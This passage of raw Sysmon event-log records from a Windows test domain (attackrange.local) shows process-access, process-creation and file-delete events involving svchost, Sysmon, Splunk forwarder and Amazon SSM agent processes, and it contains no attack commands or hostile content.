Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982033Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.710{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982032Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.710{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982031Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.710{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982030Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.710{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982029Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.710{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982028Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.709{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982027Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.709{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8E7F-6151-337A-00000000FD01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000982026Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.709{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982025Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.709{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E7F-6151-337A-00000000FD01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000982024Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.692{69CF5F33-8E7F-6151-337A-00000000FD01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000982023Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.708{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4324MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000982022Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.020{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E7F-6151-327A-00000000FD01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982021Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982020Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982019Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982018Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982017Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982016Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982015Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982014Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982013Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.020{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982012Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.020{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8E7F-6151-327A-00000000FD01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000982011Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.020{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E7F-6151-327A-00000000FD01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000982010Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:27.005{69CF5F33-8E7F-6151-327A-00000000FD01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057639Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:28.977{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210927092016-007MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057638Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:28.335{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=545BC441224DECEDFB13BCF33A2A59DC,SHA256=CA759EEC49F8FB314118E64ABF774F7C6F056CCB9F3CAFCD963EF8FDAB194C70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982053Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.410{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F112CFAFAE60CEC87360235BF159A763,SHA256=401DD2AF479DAC18CFD5AB6DFCD48DDB4899A021EB452B3899F7525CC1809772,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982052Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.410{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91899E7CC94EB15E008DB1EAA19F74A5,SHA256=F5B180F3554F06E18133D6C8E5179CF2C9B607BAB61F1B975A65F49673011C6E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000982051Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.410{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E80-6151-347A-00000000FD01}512C:\Program 